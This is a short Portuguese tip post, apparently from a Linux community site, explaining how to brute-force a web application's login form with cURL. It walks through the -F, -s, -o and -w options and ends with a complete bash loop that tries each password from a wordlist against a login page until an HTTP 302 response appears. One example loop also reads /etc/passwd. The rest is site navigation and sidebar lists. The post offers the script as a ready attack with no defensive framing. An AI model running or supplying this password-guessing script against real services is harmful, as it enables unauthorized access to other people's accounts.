cURL - Brute-force em aplicações Web
Publicado por Perfil removido em 01/05/2013
[ Hits: 17.631 ]
cURL - Brute-force em aplicações Web
Primeiro, iremos ver algumas opções de linha de comando do cURL:
curl -h
Usage: curl [options...] <url> -F/--form <name=content> Specify HTTP multipart POST data (H) -o/--output <file> Write output to <file> instead of stdout -s/--silent Silent mode. Don't output anything -w/--write-out <format> What to output after completionRessaltei essas funções, pois serão necessárias para o ataque de brute-force.
Entendo as opções:
1. As opções "-s" e "-o" são para não exibirem o conteúdo HTML do request; iremos mandar essa saída de comando para o /dev/null.
2. O comando "-F" funciona para enviar os parâmetros através de "POST request".
Exemplo:
curl -F teste=enviando-post localhost/teste.php
Exemplo:
curl -w "%{http_code}" localhost/lol
Fazendo o ataque
Agora iremos proceder para o ataque de brute-force. Primeiro, temos que saber quais os nomes dos campos que iremos enviar pelo POST request.Exemplo: login, password, log, passwd, user, etc.
Tendo essas informações, iremos transformar a saída do comando em uma variável.
Exemplo:
curl -s -o /dev/null -F login=mmxm -F pass=123456 -w "%{http_code}" localhost/login.php
login=$(curl -s -o /dev/null -F login=mmxm -F pass=123456 -w "%{http_code}" localhost/login.php)
Agora, para proceder com o ataque de "word list" iremos usar o "for" para ler um arquivo linha por linha.
Exemplo:
for i in `cat /etc/passwd`;do echo $i; done
Nosso comando final ficará assim:
for i in `cat wordlist.txt`
do
login=$(curl -s -o /dev/null -F login=mmxm -F pass=$i -w "%{http_code}" localhost/login.php)
if [ $login '==' "302" ]
then
echo "Password: $i"
break
else
echo "Trying: $i"
fi
done
Espero que tenham gostado da dica.
[]'s
Dica também publicada em:
Instalando Spotify no Ubuntu 19.04
Ubuntu 14.04: Conecta, mas não navega [Resolvido]
Instalando o SRWare Iron (Google Chrome) no Linux
Automoatizar backup no pfSense
Instale pacotes pelo apt através de uma lista
SBoupgrade - Atualize seu SlackBuild!
Criando texto "hacker" com SED
Nenhum comentário foi encontrado.
Patrocínio
Destaques
Artigos
Como extrair chaves TOTP 2FA a partir de QRCODE (Google Authenticator)
Linux em 2025: Segurança prática para o usuário
Desktop Linux em alta: novos apps, distros e privacidade marcam o sábado
IA chega ao desktop e impulsiona produtividade no mundo Linux
Novos apps de produtividade, avanços em IA e distros em ebulição agitam o universo Linux
Dicas
Como instalar o repositório do DBeaver no Ubuntu
Como instalar o Plex Media Server no Ubuntu
Digitando underscore com "shift" + "barra de espaços"
Como ativar a lixeira e recuperar aquivos deletados em um servidor Linux
Como mudar o nome de dispositivos Bluetooth via linha de comando
Tópicos
converter algoritmo C++ em C? (1)
Programa fora de escala na tela do pc (22)
Problemas com Driver NVIDIA (1)
Fedora KDE plasma 42 X Módulo de segurança BB (Warsaw-2) (1)
Top 10 do mês
-
Xerxes
1° lugar - 98.496 pts -
Fábio Berbert de Paula
2° lugar - 78.087 pts -
Alberto Federman Neto.
3° lugar - 24.071 pts -
Mauricio Ferrari
4° lugar - 21.945 pts -
edps
5° lugar - 21.617 pts -
Buckminster
6° lugar - 20.957 pts -
Alessandro de Oliveira Faria (A.K.A. CABELO)
7° lugar - 20.842 pts -
Andre (pinduvoz)
8° lugar - 18.271 pts -
Daniel Lara Souza
9° lugar - 17.670 pts -
Juliao Junior
10° lugar - 14.855 pts
Scripts
A maior comunidade GNU/Linux da América Latina! Artigos, dicas, tutoriais, fórum, scripts e muito mais. Ideal para quem busca auto-ajuda.
Site hospedado por:
